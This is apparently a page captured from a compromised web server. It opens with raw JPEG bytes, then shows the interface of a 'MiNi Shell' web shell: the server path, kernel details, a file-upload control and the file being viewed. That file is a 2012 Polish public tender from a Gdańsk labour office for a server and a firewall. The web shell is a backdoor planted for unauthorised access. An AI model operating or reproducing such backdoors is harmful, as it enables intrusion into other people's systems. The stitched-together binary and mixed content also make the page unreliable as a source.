JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120717/256118-N-2012.html

<p class="kh_header"><b>Gdańsk: Dostawa serwera i firewalla.</b><br>
<b>Numer ogłoszenia: 256118 - 2012; data zamieszczenia: 17.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Gdańsku , ul. 3 Maja 9, 80-802 Gdańsk, woj. pomorskie, tel. 058 7325282, faks 058 7325282.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa serwera i firewalla..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I
1. Serwer - 1 szt.

Parametr	Charakterystyka (wymagania minimalne)
Obudowa	Typu: TOWER z zestawem do instalacji w standardowej szafie RACK(maksymalnie 5U). Możliwość instalacji łącznie min. 12 dysków twardych Hot-Plug 3,5 cala.
Płyta główna	Płyta główna z możliwością zainstalowania do dwóch procesorów.
Chipset	Dedykowany przez producenta procesora do pracy w serwerach dwuprocesorowych
Procesor	Dwa procesory ośmiordzeniowe  klasy x86 - 64 bity, Intel E5 - 2680 lub równoważne procesory minimum ośmiordzeniowe, osiągające w testach SPECint_rate_base2006 wynik nie gorszy niż 635 punktów.  
W przypadku zaoferowania procesora równoważnego wynik testu musi być publikowany na stronie www.spec.org. Zamawiający nie wymaga złożenia wraz z ofertą wyników ww. testów. 
Pamięć RAM	64GB DDR3 1600MHz RDIMM (8x8 GB), płyta powinna obsługiwać do 768GB, na płycie głównej powinno znajdować się minimum 24 sloty przeznaczonych dla pamięci.
Zabezpieczenia pamięci RAM	Memory Rank Sparing, Memory Mirror, SBEC, Lockstep
Gniazda PCI	Minimum 7 złącz PCIe trzeciej generacji z czego minimum 4 złącza PCI-E x16. Wszystkie sloty powinny umożliwiać instalację kart pełnej długości i wysokości.
Interfejsy sieciowe	Minimum 2 złącza typu Gigabit Ethernet Base-T wbudowane na płycie głównej z obsługą iSCSI BOOT.
Napęd optyczny	Wewnętrzny napęd DVD+/-RW 16x
Karta sieciowa 	Zainstalowana w serwerze 4-portowa karta sieciowa 1Gb/s.
Karta Zarządzania	Niezależna od zainstalowanego na serwerze systemu operacyjnego posiadająca dedykowane port RJ-45 Gigabit Ethernet umożliwiająca:
zdalny dostęp do graficznego interfejsu Web karty zarządzającej
zdalne monitorowanie i informowanie o statusie serwera (m.in. prędkości obrotowej wentylatorów, konfiguracji serwera, 
szyfrowane połączenie (SSLv3) oraz autentykacje i autoryzację użytkownika
możliwość podmontowania zdalnych wirtualnych napędów
wirtualną konsolę z dostępem do myszy, klawiatury
wsparcie dla IPv6
wsparcie dla WSMAN (Web Service for Managament); SNMP; IPMI2.0, VLAN tagging, Telnet, SSH
możliwość zdalnego monitorowania w czasie rzeczywistym poboru prądu przez serwer
możliwość zdalnego ustawienia limitu poboru prądu przez konkretny serwer
integracja z Active Directory
możliwość obsługi przez dwóch administratorów jednocześnie
wsparcie dla dynamic DNS
wysyłanie do administratora maila z powiadomieniem o awarii lub zmianie konfiguracji sprzętowej
możliwość podłączenia lokalnego poprzez złącze RS-232
Posiadająca min 8 GB pamięci VFlash
Dyski twarde 	Możliwość instalacji dysków SATA, SAS, SSD. Zainstalowane  4 dyski 600GB typu HotPlug SAS 6Gbps 3,5 cala 15 obr/min. w RAID10.
Kontroler RAID	Dedykowany kontroler RAID. Cache minimum 1 GB, z zapisem na nieulotną pamięć w przypadku awarii zasilania, możliwe konfiguracje 0, 1, 10, 5, 50, 6, 60.
Porty	9 x USB 2.0 z czego 2 na przednim panelu obudowy, 6 na tylnym panelu obudowy i jeden wewnętrzny, VGA

Video	Zintegrowana karta graficzna, umożliwiająca rozdzielczość min. 1280x1024. 
Elementy redundantne HotPlug	Min. Zasilacze, dyski, wentylatory
Zasilacze	Min. 2 szt. redundantne, Hot-Plug o mocy minimum 750W każdy. 
Bezpieczeństwo	Zintegrowany z płytą główną moduł TPM. Wbudowany czujnik otwarcia obudowy współpracujący z BIOS i kartą zarządzającą.
Diagnostyka	Panel LCD umieszczony na froncie obudowy, umożliwiający wyświetlenie informacji o stanie procesora, pamięci, dysków, BIOSu, zasilaniu oraz temperaturze.
Inne	Oferowany serwer musi znajdować się na liście Windows Server Katalog i posiadać status Certified for Windows dla Windows Server 2008 R2 
x 64. 
Możliwość zainstalowania wewnętrznego modułu z redundantnymi kartami SD oraz klucza USB. Możliwość skonfigurowania mirroru pomiędzy redundantnymi kartami SD.
Warunki gwarancji	Minimum trzy lata gwarancji z czasem reakcji serwisu do 4 godzin od zgłoszenia awarii, naprawa na miejscu u klienta.
Rozpoczęcie naprawy nie później niż następnego dnia roboczego po zgłoszeniu.
Zakończenie naprawy nie później niż w ciągu 3 dni roboczych, licząc od daty zgłoszenia awarii.
Jeżeli podczas okresu gwarancyjnego nastąpi 3 krotne naprawianie tego samego elementu, Wykonawca wymieni na własny koszt naprawiany sprzęt na nowy, o co najmniej takich samych parametrach i funkcjach użytkowych

W przypadku awarii dysku twardego uszkodzony nośnik pozostaje u Zamawiającego. 
Dokumentacja użytkownika	Zamawiający wymaga dokumentacji w języku polskim lub angielskim.
Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej serwera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela.

Oprogramowanie

Microsoft Windows Server Std 2008 R2 , 64 Bit,1-4CPU, 5Clt POLISH 

VMware 5.0 for 2CPU, Standard Edition, 3 Year Subscription


WAŻNE!!!
  
1. Zamawiający wymaga, aby oferowany serwer był o parametrach nie gorszych niż wyspecyfikowany powyżej.
2. Zamawiający wymaga od Wykonawcy, z którym zostanie zawarta umowa w wyniku  niniejszego postępowania, dostarczenia wraz z serwerem deklaracji zgodności (CE) ww. sprzętu komputerowego z zasadniczymi wymaganiami dla sprzętu elektrycznego podlegającego ocenie zgodności (zgodnie z rozporządzeniem Ministra Gospodarki z dnia 21.08.2007r. w sprawie zasadniczych wymagań dla sprzętu elektrycznego - Dz. U. Nr 155, poz. 1089).
3. Ww. deklaracja musi być złożona w języku polskim w formie kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę.
4. Serwer musi być oznakowany znakiem zgodności CE. 

Część II
2. Firewall  - 1 szt.

Klasa produktu: 	Router sieciowy
Zapora sieciowa (Firewall):		Firewall klasy Stateful Inspection.
	Urządzenie obsługuje translacje adresów NAT, PAT, 1-PAT.
	Urządzenie daje możliwość ustawienia trybu pracy jako router warstwy trzeciej, jako bridge warstwy drugiej oraz hybrydowo (część jako router, a część jako bridge).
	Narzędzie do konfiguracji firewalla umożliwia tworzenie odpowiednich reguł przy użyciu prekonfigurowanych obiektów. Przy zastosowaniu takiej technologii osoba administrująca ma możliwość określania  parametrów pojedynczej reguły (adres źródłowy, adres docelowy etc.) przy wykorzystaniu obiektów określających ich logiczne przeznaczenie.
	Edytor reguł na firewallu  posiada wbudowany analizator reguł, który eliminuje sprzeczności w konfiguracji reguł lub wskazuje na użycie nieistniejących elementów (obiektów).
	Firewall umożliwia uwierzytelnienie i autoryzację użytkowników w oparciu o bazę lokalną, zewnętrzny serwer RADIUS, LDAP (wewnętrzny i zewnętrzny) lub przy współpracy z uwierzytelnieniem Windows NT4.0 (NTLM) i Windows 2k (Kerberos).
IPS (Intrusion Prevention System):		System detekcji i prewencji włamań (IPS) musi być zaimplementowany w jądrze systemu i wykrywa włamania oraz anomalia w ruchu sieciowym przy pomocy analizy protokołów, analizy heurystycznej oraz analizy w oparciu o sygnatury kontekstowe.
	Moduł IPS musi nie tylko wykrywać ale również usuwać szkodliwą zawartość w kodzie HTML oraz Javascript żądanej przez użytkownika strony internetowej.
	Moduł IPS musi być opracowany przez producenta urządzenia. Nie dopuszcza się aby moduł IPS pochodził od zewnętrznego dostawcy.
	Urządzenie ma  możliwość inspekcji dowolnego ruchu tunelowanego wewnątrz protokołu SSL.
	Administrator urządzenia ma możliwość konfiguracji jednego z trybów pracy urządzenia, to jest: IPS, IDS lub Firewall dla wybranych adresów IP (źródłowych i docelowych), użytkowników, portów (źródłowych i docelowych) oraz na podstawie pola DSCP.
Kształtowanie pasma:		Urządzenie ma możliwość kształtowania pasma w oparciu o priorytezację ruchu oraz minimalną i maksymalną wartość pasma.
	Ograniczenie pasma lub priorytezacja musi być określana względem reguły na firewallu w odniesieniu do pojedynczego połączenia, adresu IP lub autoryzowanego użytkownika oraz pola DSCP
	Rozwiązanie musi  umożliwiać tworzenie tzw. kolejki nie mającej wpływ na kształtowanie pasma a jedynie na śledzenie konkretnego typu ruchu (monitoring).
	Urządzenie musi mieć możliwość zdefiniowania priorytetu kolejki, która obsłuży cały ruch nie ujęty przez kolejki użytkownika.
Ochrona antywirusowa:		Rozwiązanie musi pozwalać na zastosowanie jednego z co najmniej dwóch skanerów antywirusowych dostarczonych przez firmy trzecie (innych niż producent rozwiązania).
	Co najmniej jeden z dwóch skanerów antywirusowych musi być dostarczany w ramach podstawowej licencji.
	Administrator musi mieć możliwość zdefiniowania treści komunikatu dla użytkownika o wykryciu infekcji, osobno dla infekcji wykrytych wewnątrz protokołu POP3, SMTP i FTP. W przypadku SMTP i FTP ponadto powinna być możliwość zdefiniowania 3-cyfrowego kodu odrzucenia.

Ochrona antyspamowa:		Urządzenie ma wbudowany mechanizm klasyfikacji przychodzącej poczty określając czy jest pocztą niechcianą (SPAM),
	Ochrona antyspamowa  działa w oparciu o Białe/Czarne listy, DNS RBL, moduł analizy heurystycznej,
	W przypadku ochrony w oparciu o serwery RBL administrator ma możliwość konfiguracji listy serwerów lub korzystania z listy serwerów wprowadzonych przez producenta urządzenia,
	W przypadku oznaczenia wiadomości jako SPAM administrator ma  możliwość określenia tekstu (Tag) jaki zostanie dodany do tematu wiadomości,

VPN (Wirtualne Sieci Prywatne):		Urządzenie musi posiadać wbudowany serwer VPN umożliwiający budowanie połączeń VPN typu client-to-site (klient mobilny - lokalizacja) lub site-to-site (lokalizacja-lokalizacja).
	Odpowiednio kanały VPN można budować w oparciu o:
o	PPTP VPN
o	IPSec VPN
o	SSL VPN
	Urządzenie musi posiadać funkcjonalność przełączenia tunelu na łącze zapasowe na wypadek awarii łącza dostawcy podstawowego (VPN Failover)
	Urządzenie musi posiadać wsparcie dla technologii XAuth, Hub n Spoke oraz modconf.

Uwierzytelnianie:		Urządzenie musi pozwalać na uruchomienie systemu uwierzytelniania użytkowników w oparciu o:
o	lokalną bazę użytkowników (wewnętrzny LDAP),
o	zewnętrzną bazę użytkowników (zewnętrzny LDAP) ,
o	integracje z serwerem Microsoft Active Directory.
	rozwiązanie musi pozwalać na uruchomienie specjalnego portalu, który umożliwia 
autoryzacje w oparciu o protokoły:
o	SSL
o	Radius
o	NTLM
o	Kerberos
	Autoryzacja użytkowników z wykorzystaniem użytkowników Microsoft Active Directory nie wymaga instalacji agenta na serwerze AD ani modyfikacji schematu.

 
Zarządzanie łączami internetowymi:		Urządzenie musi posiadać wsparcie dla mechanizmów równoważenia obciążenia łączy do sieci Internet (tzw. Load Balancing).
	Mechanizm równoważenia obciążenia łącza internetowego musi działać w oparciu o następujące dwa mechanizmy:
o	równoważenie względem adresu źródłowego.
o	równoważenie względem adresu docelowego.
	Urządzenie musi posiadać mechanizm przełączenia na łącze zapasowe w przypadku awarii łącza podstawowego.,

Administracja urządzeniem:		Producent musi dostarczać w podstawowej licencji narzędzie administracyjne pozwalające na podgląd pracy urządzenia, monitoring w trybie rzeczywistym stanu urządzenia.
	Konfiguracja urządzenia musi być możliwa z wykorzystaniem polskiego interfejsu graficznego.
	Komunikacja pomiędzy aplikacją do zarządzania, a urządzeniem musi odbywać się przez przeglądarkę www z wykorzystaniem bezpiecznego protokołu https.
	Urządzenie może być zarządzane przez dowolną liczbę administratorów z różnymi (także nakładającymi się) uprawnieniami.
	Urządzenie musi być dostępne wraz z konsolą do centralnej administracji pozwalającą na zarządzanie przynajmniej 5 urządzeniami w różnych lokalizacjach w podstawowej cenie urządzenia.
	Urządzenie musi mieć możliwość eksportowania logów na zewnętrzny serwer (syslog).

Parametry sprzętowe:		Urządzenie wyposażone w dysk twardy o pojemności co najmniej 70 GB. Dysk podzielony na co najmniej 3 partycje. W tym dwie systemowe (umożliwiając tym samym start urządzenia z jednej z dwóch partycji) oraz jedną przeznaczoną na logi. 
	Liczba portów Ethernet 10/100/1000 - 6
	Przepustowość Firewall-a wraz z włączonym systemem IPS - nie mniej niż 850 Mbps.
	Minimalna przepustowość tunelu VPN przy szyfrowaniu AES - nie mniej niż 190 Mbps.
	Maksymalna liczba tuneli VPN IPSec nie może być mniejsza niż 1000.
	Obsługa 128 VLAN-ów
	Maksymalna liczba równoczesnych sesji nie może być mniejsza niż 400 000.
	Urządzenie nie może posiadać limitu użytkowników łączących się z urządzeniem. 
Parametry dodatkowe:	Urządzenie musi zawierać opcję skanowania wnętrza sieci w poszukiwaniu jej słabych punktów i potencjalnych zagrożeń a tym samym eliminację zagrożeń wynikających ze stosowania nieaktualnych aplikacji.

Serwis:	Licencja odnawialna do urządzenia na okres minimum 1-go roku. W ciągu tego roku Wykonawca jest zobowiązany do: 
	udostępniania aktualizacji do wszystkich modułów urządzenia (w tym do pasywnego skanera wnętrza sieci) ,
	wsparcia technicznego od poniedziałku do piątku od 8.00 do 18.00,
	wymiany urządzenia na nowe w przypadku jego awarii - 
w ciągu 14 dni od daty zgłoszenia awarii przez Zamawiającego.


Gwarancja na ww. firewall  nie krótsza niż 1 rok.

WAŻNE!!!
  
1. Zamawiający wymaga, aby oferowany firewall był o parametrach nie gorszych niż wyspecyfikowane powyżej.
2. Zamawiający wymaga dołączenia do oferty nazwy firmy, modelu oraz parametrów technicznych oferowanego firewalla. 
3. Zamawiający wymaga od Wykonawcy, z którym zostanie zawarta umowa w wyniku  niniejszego postępowania, dostarczenia wraz z firewallem deklaracji zgodności (CE) ww. sprzętu komputerowego z zasadniczymi wymaganiami dla sprzętu elektrycznego podlegającego ocenie zgodności (zgodnie z rozporządzeniem Ministra Gospodarki z dnia 21.08.2007r. w sprawie zasadniczych wymagań dla sprzętu elektrycznego - Dz. U. Nr 155, poz. 1089).
4. Ww. deklaracja musi być złożona w języku polskim w formie kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę.
5. Firewall musi być oznakowany znakiem zgodności CE..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.82.20.00-6, 30.23.60.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. 3 Maja 9
80-802 Gdańsk, pok. 215 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 09:00, miejsce: Powiatowy Urząd Pracy
ul. 3 Maja 9
80-802 Gdańsk, pok. 214 II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa serwera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> serwer - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.82.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa firewalla.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> firewall - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com